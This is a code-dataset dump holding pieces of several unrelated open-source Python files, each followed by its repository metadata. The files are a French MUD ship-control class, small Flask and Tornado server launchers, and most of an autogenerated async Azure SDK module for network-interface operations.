"""Retourne le commdnant (PNJ) du navire."""
commandants = self.equipage.get_matelots_au_poste("commandant",
libre=False)
if commandants:
return commandants[0]
return None
def decomposer(self):
"""Décompose le contrôle en volontés.
C'est la méthode la plus importante et celle qui risque de contenir
le plus de code. Elle décompose réellement le contrôle en volontés
(plier 2 voiles, ramer lentement, par exemple).
"""
raise NotImplementedError
def debug(self, message):
"""Log le message précisé en paramètre en ajoutant des informations."""
message = "Contrôle {}:{}, {}".format(self.cle_navire, self.cle,
message)
self.logger.debug(message)
|
vlegoff/tsunami
|
src/secondaires/navigation/equipage/controle.py
|
Python
|
bsd-3-clause
| 5,105 | 0.001191 |
# coding: utf-8
from deploy import app
if __name__ == '__main__':
app.run(debug = True)
|
TL4/deploy
|
run.py
|
Python
|
mit
| 92 | 0.032609 |
import logging
import os
import sys
from tornado import ioloop
from tornado import web
from pyjobs import handlers
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
STATIC_PATH = os.path.join(os.path.dirname(__file__), 'static/')
url_patterns = [
web.url('/', handlers.HomeHandler, name='home'),
web.url('/ws', handlers.WebSocketHandler),
web.url('/static/(.*)', web.StaticFileHandler, {'path': STATIC_PATH}),
]
settings = {
'compiled_template_cache': False,
}
def server():
logger.info('Serving on port 8888')
application = web.Application(url_patterns, **settings)
application.listen(8888)
ioloop.IOLoop.current().start()
if __name__ == '__main__':
server()
|
winstonf88/pyjobs
|
pyjobs/app.py
|
Python
|
gpl-2.0
| 750 | 0.001333 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations:
"""NetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def get(
self,
resource_group_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> "_models.NetworkInterface":
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> AsyncLROPoller["_models.NetworkInterface"]:
"""Creates or updates a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_08_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def update_tags(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> "_models.NetworkInterface":
"""Updates a network interface tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to update network interface tags.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
async def _get_effective_route_table_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveRouteListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveRouteListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def begin_get_effective_route_table(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveRouteListResult"]:
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_08_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def _list_effective_network_security_groups_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveNetworkSecurityGroupListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveNetworkSecurityGroupListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
async def begin_list_effective_network_security_groups(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveNetworkSecurityGroupListResult"]:
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_08_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
